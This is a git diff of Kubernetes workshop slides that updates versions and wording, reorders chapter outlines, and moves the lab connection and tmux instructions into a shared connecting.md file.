||||
apiVersion: v1
|
||||
@@ -212,7 +267,7 @@ spec:
|
||||
- image: ...
|
||||
name: container-using-a-claim
|
||||
volumeMounts:
|
||||
- mountPath: /my-ebs
|
||||
- mountPath: /my-vol
|
||||
name: my-volume
|
||||
volumes:
|
||||
- name: my-volume
|
||||
|
||||
@@ -18,7 +18,7 @@
|
||||
|
||||
## A possible approach
|
||||
|
||||
- Since each component of the control plane can be replicated ...
|
||||
- Since each component of the control plane can be replicated...
|
||||
|
||||
- We could set up the control plane outside of the cluster
|
||||
|
||||
@@ -39,9 +39,9 @@
|
||||
- Worst case scenario, we might need to:
|
||||
|
||||
- set up a new control plane (outside of the cluster)
|
||||
|
||||
|
||||
- restore a backup from the old control plane
|
||||
|
||||
|
||||
- move the new control plane to the cluster (again)
|
||||
|
||||
- This doesn't sound like a great experience
|
||||
@@ -57,12 +57,12 @@
|
||||
- The kubelet can also get a list of *static pods* from:
|
||||
|
||||
- a directory containing one (or multiple) *manifests*, and/or
|
||||
|
||||
|
||||
- a URL (serving a *manifest*)
|
||||
|
||||
- These "manifests" are basically YAML definitions
|
||||
|
||||
(As produced by `kubectl get pod my-little-pod -o yaml --export`)
|
||||
(As produced by `kubectl get pod my-little-pod -o yaml`)
|
||||
|
||||
---
|
||||
|
||||
@@ -100,11 +100,11 @@
|
||||
|
||||
## Static pods vs normal pods
|
||||
|
||||
- The API only gives us a read-only access to static pods
|
||||
- The API only gives us read-only access to static pods
|
||||
|
||||
- We can `kubectl delete` a static pod ...
|
||||
- We can `kubectl delete` a static pod...
|
||||
|
||||
... But the kubelet will restart it immediately
|
||||
...But the kubelet will re-mirror it immediately
|
||||
|
||||
- Static pods can be selected just like other pods
|
||||
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
## Versions installed
|
||||
|
||||
- Kubernetes 1.14.1
|
||||
- Docker Engine 18.09.5
|
||||
- Kubernetes 1.15.0
|
||||
- Docker Engine 18.09.6
|
||||
- Docker Compose 1.21.1
|
||||
|
||||
<!-- ##VERSION## -->
|
||||
@@ -23,13 +23,13 @@ class: extra-details
|
||||
|
||||
## Kubernetes and Docker compatibility
|
||||
|
||||
- Kubernetes 1.14 validates Docker Engine versions [up to 18.09](https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.14.md#external-dependencies)
|
||||
- Kubernetes 1.15 validates Docker Engine versions [up to 18.09](https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.15.md#dependencies)
|
||||
<br/>
|
||||
(the latest version when Kubernetes 1.14 was released)
|
||||
|
||||
- Kubernetes 1.13 only validates Docker Engine versions [up to 18.06](https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.13.md#external-dependencies)
|
||||
|
||||
- Is this a problem if I use Kubernetes with a "too recent" Docker Engine?
|
||||
- Is it a problem if I use Kubernetes with a "too recent" Docker Engine?
|
||||
|
||||
--
|
||||
|
||||
|
||||
@@ -18,6 +18,8 @@
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Kubernetes volumes vs. Docker volumes
|
||||
|
||||
- Kubernetes and Docker volumes are very similar
|
||||
@@ -26,22 +28,44 @@
|
||||
<br/>
|
||||
but it refers to Docker 1.7, which was released in 2015!)
|
||||
|
||||
- Docker volumes allow to share data between containers running on the same host
|
||||
- Docker volumes allow us to share data between containers running on the same host
|
||||
|
||||
- Kubernetes volumes allow us to share data between containers in the same pod
|
||||
|
||||
- Both Docker and Kubernetes volumes allow us access to storage systems
|
||||
- Both Docker and Kubernetes volumes enable access to storage systems
|
||||
|
||||
- Kubernetes volumes are also used to expose configuration and secrets
|
||||
|
||||
- Docker has specific concepts for configuration and secrets
|
||||
|
||||
<br/>
|
||||
(but under the hood, the technical implementation is similar)
|
||||
|
||||
- If you're not familiar with Docker volumes, you can safely ignore this slide!
|
||||
|
||||
---
|
||||
|
||||
## Volumes ≠ Persistent Volumes
|
||||
|
||||
- Volumes and Persistent Volumes are related, but very different!
|
||||
|
||||
- *Volumes*:
|
||||
|
||||
- appear in Pod specifications (see next slide)
|
||||
|
||||
- do not exist as API resources (**cannot** do `kubectl get volumes`)
|
||||
|
||||
- *Persistent Volumes*:
|
||||
|
||||
- are API resources (**can** do `kubectl get persistentvolumes`)
|
||||
|
||||
- correspond to concrete volumes (e.g. on a SAN, EBS, etc.)
|
||||
|
||||
- cannot be associated with a Pod directly; but through a Persistent Volume Claim
|
||||
|
||||
- won't be discussed further in this section
|
||||
|
||||
---
|
||||
|
||||
## A simple volume example
|
||||
|
||||
```yaml
|
||||
|
||||
@@ -132,6 +132,8 @@ And *then* it is time to look at orchestration!
|
||||
|
|
||||
[Persistent Volumes](kube-selfpaced.yml.html#toc-highly-available-persistent-volumes)
|
||||
|
||||
- Excellent [blog post](http://www.databasesoup.com/2018/07/should-i-run-postgres-on-kubernetes.html) tackling the question: “Should I run Postgres on Kubernetes?”
|
||||
|
||||
---
|
||||
|
||||
## HTTP traffic handling
|
||||
|
||||
@@ -38,6 +38,7 @@ chapters:
|
||||
- - k8s/resource-limits.md
|
||||
- k8s/metrics-server.md
|
||||
- k8s/cluster-sizing.md
|
||||
- k8s/horizontal-pod-autoscaler.md
|
||||
- - k8s/lastwords-admin.md
|
||||
- k8s/links.md
|
||||
- shared/thankyou.md
|
||||
69
slides/kadm-twodays.yml
Normal file
69
slides/kadm-twodays.yml
Normal file
@@ -0,0 +1,69 @@
|
||||
title: |
|
||||
Kubernetes
|
||||
for administrators
|
||||
and operators
|
||||
|
||||
#chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
|
||||
#chat: "[Gitter](https://gitter.im/jpetazzo/workshop-yyyymmdd-city)"
|
||||
chat: "In person!"
|
||||
|
||||
gitrepo: github.com/jpetazzo/container.training
|
||||
|
||||
slides: http://container.training/
|
||||
|
||||
exclude:
|
||||
- self-paced
|
||||
|
||||
chapters:
|
||||
- shared/title.md
|
||||
- logistics.md
|
||||
- k8s/intro.md
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
# DAY 1
|
||||
- - k8s/prereqs-admin.md
|
||||
- k8s/architecture.md
|
||||
- k8s/deploymentslideshow.md
|
||||
- k8s/dmuc.md
|
||||
- - k8s/multinode.md
|
||||
- k8s/cni.md
|
||||
- - k8s/apilb.md
|
||||
- k8s/setup-managed.md
|
||||
- k8s/setup-selfhosted.md
|
||||
- k8s/cluster-upgrade.md
|
||||
- k8s/staticpods.md
|
||||
- - k8s/cluster-backup.md
|
||||
- k8s/cloud-controller-manager.md
|
||||
- k8s/healthchecks.md
|
||||
- k8s/healthchecks-more.md
|
||||
# DAY 2
|
||||
- - k8s/kubercoins.md
|
||||
- k8s/logs-cli.md
|
||||
- k8s/logs-centralized.md
|
||||
- k8s/authn-authz.md
|
||||
- k8s/csr-api.md
|
||||
- - k8s/openid-connect.md
|
||||
- k8s/control-plane-auth.md
|
||||
###- k8s/bootstrap.md
|
||||
- k8s/netpol.md
|
||||
- k8s/podsecuritypolicy.md
|
||||
- - k8s/resource-limits.md
|
||||
- k8s/metrics-server.md
|
||||
- k8s/cluster-sizing.md
|
||||
- k8s/horizontal-pod-autoscaler.md
|
||||
- - k8s/prometheus.md
|
||||
- k8s/extending-api.md
|
||||
- k8s/operators.md
|
||||
###- k8s/operators-design.md
|
||||
# CONCLUSION
|
||||
- - k8s/lastwords-admin.md
|
||||
- k8s/links.md
|
||||
- shared/thankyou.md
|
||||
- |
|
||||
# (All content after this slide is bonus material)
|
||||
# EXTRA
|
||||
- - k8s/volumes.md
|
||||
- k8s/configuration.md
|
||||
- k8s/statefulsets.md
|
||||
- k8s/local-persistent-volumes.md
|
||||
- k8s/portworx.md
|
||||
@@ -20,44 +20,47 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- shared/connecting.md
|
||||
- k8s/versions-k8s.md
|
||||
- shared/sampleapp.md
|
||||
# - shared/composescale.md
|
||||
# - shared/hastyconclusions.md
|
||||
#- shared/composescale.md
|
||||
#- shared/hastyconclusions.md
|
||||
- shared/composedown.md
|
||||
- k8s/concepts-k8s.md
|
||||
- shared/declarative.md
|
||||
- k8s/declarative.md
|
||||
- - k8s/kubenet.md
|
||||
- k8s/kubectlget.md
|
||||
- k8s/kubenet.md
|
||||
- - k8s/kubectlget.md
|
||||
- k8s/setup-k8s.md
|
||||
- k8s/kubectlrun.md
|
||||
- k8s/deploymentslideshow.md
|
||||
- k8s/kubectlexpose.md
|
||||
- - k8s/shippingimages.md
|
||||
# - k8s/buildshiprun-selfhosted.md
|
||||
#- k8s/buildshiprun-selfhosted.md
|
||||
- k8s/buildshiprun-dockerhub.md
|
||||
- k8s/ourapponkube.md
|
||||
# - k8s/kubectlproxy.md
|
||||
# - k8s/localkubeconfig.md
|
||||
# - k8s/accessinternal.md
|
||||
#- k8s/kubectlproxy.md
|
||||
#- k8s/localkubeconfig.md
|
||||
#- k8s/accessinternal.md
|
||||
- k8s/dashboard.md
|
||||
# - k8s/kubectlscale.md
|
||||
#- k8s/kubectlscale.md
|
||||
- k8s/scalingdockercoins.md
|
||||
- shared/hastyconclusions.md
|
||||
- k8s/daemonset.md
|
||||
- - k8s/rollout.md
|
||||
# - k8s/healthchecks.md
|
||||
- k8s/namespaces.md
|
||||
#- k8s/kustomize.md
|
||||
#- k8s/helm.md
|
||||
#- k8s/create-chart.md
|
||||
#- k8s/healthchecks.md
|
||||
- k8s/logs-cli.md
|
||||
- k8s/logs-centralized.md
|
||||
#- - k8s/helm.md
|
||||
# - k8s/create-chart.md
|
||||
# - k8s/kustomize.md
|
||||
# - k8s/namespaces.md
|
||||
# - k8s/netpol.md
|
||||
# - k8s/authn-authz.md
|
||||
#- - k8s/ingress.md
|
||||
# - k8s/gitworkflows.md
|
||||
#- k8s/netpol.md
|
||||
#- k8s/authn-authz.md
|
||||
#- k8s/csr-api.md
|
||||
#- k8s/podsecuritypolicy.md
|
||||
#- k8s/ingress.md
|
||||
#- k8s/gitworkflows.md
|
||||
- k8s/prometheus.md
|
||||
#- - k8s/volumes.md
|
||||
# - k8s/build-with-docker.md
|
||||
@@ -68,6 +71,8 @@ chapters:
|
||||
# - k8s/operators.md
|
||||
# - k8s/operators-design.md
|
||||
# - k8s/statefulsets.md
|
||||
#- k8s/local-persistent-volumes.md
|
||||
#- k8s/staticpods.md
|
||||
# - k8s/portworx.md
|
||||
- - k8s/whatsnext.md
|
||||
- k8s/links.md
|
||||
|
||||
@@ -22,6 +22,7 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- shared/connecting.md
|
||||
- k8s/versions-k8s.md
|
||||
- shared/sampleapp.md
|
||||
# Bridget doesn't go into as much depth with compose
|
||||
@@ -53,10 +54,10 @@ chapters:
|
||||
- - k8s/logs-cli.md
|
||||
# Bridget hasn't added EFK yet
|
||||
#- k8s/logs-centralized.md
|
||||
- k8s/namespaces.md
|
||||
- k8s/helm.md
|
||||
- k8s/create-chart.md
|
||||
#- k8s/kustomize.md
|
||||
- k8s/namespaces.md
|
||||
#- k8s/netpol.md
|
||||
- k8s/whatsnext.md
|
||||
# - k8s/links.md
|
||||
|
||||
@@ -20,6 +20,7 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- shared/connecting.md
|
||||
- k8s/versions-k8s.md
|
||||
- shared/sampleapp.md
|
||||
- shared/composescale.md
|
||||
@@ -33,8 +34,8 @@ chapters:
|
||||
- k8s/setup-k8s.md
|
||||
- k8s/kubectlrun.md
|
||||
- k8s/deploymentslideshow.md
|
||||
- k8s/kubectlexpose.md
|
||||
- - k8s/shippingimages.md
|
||||
- - k8s/kubectlexpose.md
|
||||
- k8s/shippingimages.md
|
||||
- k8s/buildshiprun-selfhosted.md
|
||||
- k8s/buildshiprun-dockerhub.md
|
||||
- k8s/ourapponkube.md
|
||||
@@ -42,20 +43,22 @@ chapters:
|
||||
- k8s/localkubeconfig.md
|
||||
- k8s/accessinternal.md
|
||||
- k8s/dashboard.md
|
||||
- k8s/kubectlscale.md
|
||||
- - k8s/kubectlscale.md
|
||||
# - k8s/scalingdockercoins.md
|
||||
# - shared/hastyconclusions.md
|
||||
- k8s/daemonset.md
|
||||
- - k8s/rollout.md
|
||||
- k8s/rollout.md
|
||||
- k8s/namespaces.md
|
||||
- - k8s/kustomize.md
|
||||
- k8s/helm.md
|
||||
- k8s/create-chart.md
|
||||
- k8s/healthchecks.md
|
||||
- k8s/logs-cli.md
|
||||
- k8s/logs-centralized.md
|
||||
- - k8s/helm.md
|
||||
#- k8s/create-chart.md
|
||||
- k8s/kustomize.md
|
||||
- k8s/namespaces.md
|
||||
- k8s/netpol.md
|
||||
- - k8s/netpol.md
|
||||
- k8s/authn-authz.md
|
||||
- k8s/csr-api.md
|
||||
- k8s/podsecuritypolicy.md
|
||||
- - k8s/ingress.md
|
||||
- k8s/gitworkflows.md
|
||||
- k8s/prometheus.md
|
||||
@@ -67,7 +70,8 @@ chapters:
|
||||
- k8s/extending-api.md
|
||||
- k8s/operators.md
|
||||
- k8s/operators-design.md
|
||||
- k8s/statefulsets.md
|
||||
- - k8s/statefulsets.md
|
||||
- k8s/local-persistent-volumes.md
|
||||
- k8s/portworx.md
|
||||
- k8s/staticpods.md
|
||||
- - k8s/whatsnext.md
|
||||
|
||||
@@ -20,6 +20,7 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- shared/connecting.md
|
||||
- k8s/versions-k8s.md
|
||||
- shared/sampleapp.md
|
||||
#- shared/composescale.md
|
||||
@@ -28,8 +29,8 @@ chapters:
|
||||
- k8s/concepts-k8s.md
|
||||
- shared/declarative.md
|
||||
- k8s/declarative.md
|
||||
- - k8s/kubenet.md
|
||||
- k8s/kubectlget.md
|
||||
- k8s/kubenet.md
|
||||
- - k8s/kubectlget.md
|
||||
- k8s/setup-k8s.md
|
||||
- k8s/kubectlrun.md
|
||||
- k8s/deploymentslideshow.md
|
||||
@@ -47,15 +48,17 @@ chapters:
|
||||
- shared/hastyconclusions.md
|
||||
- - k8s/daemonset.md
|
||||
- k8s/rollout.md
|
||||
- k8s/healthchecks.md
|
||||
- k8s/namespaces.md
|
||||
- k8s/kustomize.md
|
||||
#- k8s/helm.md
|
||||
#- k8s/create-chart.md
|
||||
- - k8s/healthchecks.md
|
||||
- k8s/logs-cli.md
|
||||
- k8s/logs-centralized.md
|
||||
- - k8s/helm.md
|
||||
#- k8s/create-chart.md
|
||||
- k8s/kustomize.md
|
||||
- k8s/namespaces.md
|
||||
- k8s/netpol.md
|
||||
#- k8s/netpol.md
|
||||
- k8s/authn-authz.md
|
||||
- k8s/csr-api.md
|
||||
- k8s/podsecuritypolicy.md
|
||||
- - k8s/ingress.md
|
||||
#- k8s/gitworkflows.md
|
||||
- k8s/prometheus.md
|
||||
@@ -68,8 +71,9 @@ chapters:
|
||||
- k8s/operators.md
|
||||
- k8s/operators-design.md
|
||||
- - k8s/statefulsets.md
|
||||
- k8s/local-persistent-volumes.md
|
||||
- k8s/portworx.md
|
||||
- k8s/staticpods.md
|
||||
#- k8s/staticpods.md
|
||||
- - k8s/whatsnext.md
|
||||
- k8s/links.md
|
||||
- shared/thankyou.md
|
||||
|
||||
133
slides/shared/connecting.md
Normal file
133
slides/shared/connecting.md
Normal file
@@ -0,0 +1,133 @@
|
||||
class: in-person
|
||||
|
||||
## Connecting to our lab environment
|
||||
|
||||
.exercise[
|
||||
|
||||
- Log into the first VM (`node1`) with your SSH client
|
||||
|
||||
<!--
|
||||
```bash
|
||||
for N in $(awk '/\Wnode/{print $2}' /etc/hosts); do
|
||||
ssh -o StrictHostKeyChecking=no $N true
|
||||
done
|
||||
```
|
||||
|
||||
```bash
|
||||
### FIXME find a way to reset the cluster, maybe?
|
||||
```
|
||||
-->
|
||||
|
||||
- Check that you can SSH (without password) to `node2`:
|
||||
```bash
|
||||
ssh node2
|
||||
```
|
||||
- Type `exit` or `^D` to come back to `node1`
|
||||
|
||||
<!-- ```bash exit``` -->
|
||||
|
||||
]
|
||||
|
||||
If anything goes wrong — ask for help!
|
||||
|
||||
---
|
||||
|
||||
## Doing or re-doing the workshop on your own?
|
||||
|
||||
- Use something like
|
||||
[Play-With-Docker](http://play-with-docker.com/) or
|
||||
[Play-With-Kubernetes](https://training.play-with-kubernetes.com/)
|
||||
|
||||
Zero setup effort; but environment are short-lived and
|
||||
might have limited resources
|
||||
|
||||
- Create your own cluster (local or cloud VMs)
|
||||
|
||||
Small setup effort; small cost; flexible environments
|
||||
|
||||
- Create a bunch of clusters for you and your friends
|
||||
([instructions](https://@@GITREPO@@/tree/master/prepare-vms))
|
||||
|
||||
Bigger setup effort; ideal for group training
|
||||
|
||||
---
|
||||
|
||||
class: self-paced
|
||||
|
||||
## Get your own Docker nodes
|
||||
|
||||
- If you already have some Docker nodes: great!
|
||||
|
||||
- If not: let's get some thanks to Play-With-Docker
|
||||
|
||||
.exercise[
|
||||
|
||||
- Go to http://www.play-with-docker.com/
|
||||
|
||||
- Log in
|
||||
|
||||
- Create your first node
|
||||
|
||||
<!-- ```open http://www.play-with-docker.com/``` -->
|
||||
|
||||
]
|
||||
|
||||
You will need a Docker ID to use Play-With-Docker.
|
||||
|
||||
(Creating a Docker ID is free.)
|
||||
|
||||
---
|
||||
|
||||
## We will (mostly) interact with node1 only
|
||||
|
||||
*These remarks apply only when using multiple nodes, of course.*
|
||||
|
||||
- Unless instructed, **all commands must be run from the first VM, `node1`**
|
||||
|
||||
- We will only check out/copy the code on `node1`
|
||||
|
||||
- During normal operations, we do not need access to the other nodes
|
||||
|
||||
- If we had to troubleshoot issues, we would use a combination of:
|
||||
|
||||
- SSH (to access system logs, daemon status...)
|
||||
|
||||
- Docker API (to check running containers and container engine status)
|
||||
|
||||
---
|
||||
|
||||
## Terminals
|
||||
|
||||
Once in a while, the instructions will say:
|
||||
<br/>"Open a new terminal."
|
||||
|
||||
There are multiple ways to do this:
|
||||
|
||||
- create a new window or tab on your machine, and SSH into the VM;
|
||||
|
||||
- use screen or tmux on the VM and open a new window from there.
|
||||
|
||||
You are welcome to use the method that you feel the most comfortable with.
|
||||
|
||||
---
|
||||
|
||||
## Tmux cheatsheet
|
||||
|
||||
[Tmux](https://en.wikipedia.org/wiki/Tmux) is a terminal multiplexer like `screen`.
|
||||
|
||||
*You don't have to use it or even know about it to follow along.
|
||||
<br/>
|
||||
But some of us like to use it to switch between terminals.
|
||||
<br/>
|
||||
It has been preinstalled on your workshop nodes.*
|
||||
|
||||
- Ctrl-b c → creates a new window
|
||||
- Ctrl-b n → go to next window
|
||||
- Ctrl-b p → go to previous window
|
||||
- Ctrl-b " → split window top/bottom
|
||||
- Ctrl-b % → split window left/right
|
||||
- Ctrl-b Alt-1 → rearrange windows in columns
|
||||
- Ctrl-b Alt-2 → rearrange windows in rows
|
||||
- Ctrl-b arrows → navigate to other windows
|
||||
- Ctrl-b d → detach session
|
||||
- tmux attach → reattach to session
|
||||
@@ -90,7 +90,7 @@ class: in-person
|
||||
|
||||
## Why don't we run containers locally?
|
||||
|
||||
- Installing that stuff can be hard on some machines
|
||||
- Installing this stuff can be hard on some machines
|
||||
|
||||
(32 bits CPU or OS... Laptops without administrator access... etc.)
|
||||
|
||||
@@ -169,143 +169,3 @@ class: in-person, extra-details
|
||||
- It requires UDP ports to be open
|
||||
|
||||
(By default, it uses a UDP port between 60000 and 61000)
|
||||
|
||||
---
|
||||
|
||||
class: in-person
|
||||
|
||||
## Connecting to our lab environment
|
||||
|
||||
.exercise[
|
||||
|
||||
- Log into the first VM (`node1`) with your SSH client
|
||||
|
||||
<!--
|
||||
```bash
|
||||
for N in $(awk '/\Wnode/{print $2}' /etc/hosts); do
|
||||
ssh -o StrictHostKeyChecking=no $N true
|
||||
done
|
||||
```
|
||||
|
||||
```bash
|
||||
if which kubectl; then
|
||||
kubectl get deploy,ds -o name | xargs -rn1 kubectl delete
|
||||
kubectl get all -o name | grep -v service/kubernetes | xargs -rn1 kubectl delete --ignore-not-found=true
|
||||
kubectl -n kube-system get deploy,svc -o name | grep -v dns | xargs -rn1 kubectl -n kube-system delete
|
||||
fi
|
||||
```
|
||||
-->
|
||||
|
||||
- Check that you can SSH (without password) to `node2`:
|
||||
```bash
|
||||
ssh node2
|
||||
```
|
||||
- Type `exit` or `^D` to come back to `node1`
|
||||
|
||||
<!-- ```bash exit``` -->
|
||||
|
||||
]
|
||||
|
||||
If anything goes wrong — ask for help!
|
||||
|
||||
---
|
||||
|
||||
## Doing or re-doing the workshop on your own?
|
||||
|
||||
- Use something like
|
||||
[Play-With-Docker](http://play-with-docker.com/) or
|
||||
[Play-With-Kubernetes](https://training.play-with-kubernetes.com/)
|
||||
|
||||
Zero setup effort; but environment are short-lived and
|
||||
might have limited resources
|
||||
|
||||
- Create your own cluster (local or cloud VMs)
|
||||
|
||||
Small setup effort; small cost; flexible environments
|
||||
|
||||
- Create a bunch of clusters for you and your friends
|
||||
([instructions](https://@@GITREPO@@/tree/master/prepare-vms))
|
||||
|
||||
Bigger setup effort; ideal for group training
|
||||
|
||||
---
|
||||
|
||||
class: self-paced
|
||||
|
||||
## Get your own Docker nodes
|
||||
|
||||
- If you already have some Docker nodes: great!
|
||||
|
||||
- If not: let's get some thanks to Play-With-Docker
|
||||
|
||||
.exercise[
|
||||
|
||||
- Go to http://www.play-with-docker.com/
|
||||
|
||||
- Log in
|
||||
|
||||
- Create your first node
|
||||
|
||||
<!-- ```open http://www.play-with-docker.com/``` -->
|
||||
|
||||
]
|
||||
|
||||
You will need a Docker ID to use Play-With-Docker.
|
||||
|
||||
(Creating a Docker ID is free.)
|
||||
|
||||
---
|
||||
|
||||
## We will (mostly) interact with node1 only
|
||||
|
||||
*These remarks apply only when using multiple nodes, of course.*
|
||||
|
||||
- Unless instructed, **all commands must be run from the first VM, `node1`**
|
||||
|
||||
- We will only checkout/copy the code on `node1`
|
||||
|
||||
- During normal operations, we do not need access to the other nodes
|
||||
|
||||
- If we had to troubleshoot issues, we would use a combination of:
|
||||
|
||||
- SSH (to access system logs, daemon status...)
|
||||
|
||||
- Docker API (to check running containers and container engine status)
|
||||
|
||||
---
|
||||
|
||||
## Terminals
|
||||
|
||||
Once in a while, the instructions will say:
|
||||
<br/>"Open a new terminal."
|
||||
|
||||
There are multiple ways to do this:
|
||||
|
||||
- create a new window or tab on your machine, and SSH into the VM;
|
||||
|
||||
- use screen or tmux on the VM and open a new window from there.
|
||||
|
||||
You are welcome to use the method that you feel the most comfortable with.
|
||||
|
||||
---
|
||||
|
||||
## Tmux cheatsheet
|
||||
|
||||
[Tmux](https://en.wikipedia.org/wiki/Tmux) is a terminal multiplexer like `screen`.
|
||||
|
||||
*You don't have to use it or even know about it to follow along.
|
||||
<br/>
|
||||
But some of us like to use it to switch between terminals.
|
||||
<br/>
|
||||
It has been preinstalled on your workshop nodes.*
|
||||
|
||||
- Ctrl-b c → creates a new window
|
||||
- Ctrl-b n → go to next window
|
||||
- Ctrl-b p → go to previous window
|
||||
- Ctrl-b " → split window top/bottom
|
||||
- Ctrl-b % → split window left/right
|
||||
- Ctrl-b Alt-1 → rearrange windows in columns
|
||||
- Ctrl-b Alt-2 → rearrange windows in rows
|
||||
- Ctrl-b arrows → navigate to other windows
|
||||
- Ctrl-b d → detach session
|
||||
- tmux attach → reattach to session
|
||||
|
||||
@@ -80,7 +80,7 @@ and displays aggregated logs.
|
||||
|
||||
- DockerCoins is *not* a cryptocurrency
|
||||
|
||||
(the only common points are "randomness", "hashing", and "coins" in the name)
|
||||
(the only common points are "randomness," "hashing," and "coins" in the name)
|
||||
|
||||
---
|
||||
|
||||
@@ -134,7 +134,7 @@ How does each service find out the address of the other ones?
|
||||
|
||||
- We do not hard-code IP addresses in the code
|
||||
|
||||
- We do not hard-code FQDN in the code, either
|
||||
- We do not hard-code FQDNs in the code, either
|
||||
|
||||
- We just connect to a service name, and container-magic does the rest
|
||||
|
||||
@@ -173,7 +173,7 @@ class: extra-details
|
||||
|
||||
- Compose file version 2+ makes each container reachable through its service name
|
||||
|
||||
- Compose file version 1 did require "links" sections
|
||||
- Compose file version 1 required "links" sections to accomplish this
|
||||
|
||||
- Network aliases are automatically namespaced
|
||||
|
||||
|
||||
@@ -24,6 +24,7 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- shared/connecting.md
|
||||
- swarm/versions.md
|
||||
- shared/sampleapp.md
|
||||
- shared/composescale.md
|
||||
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user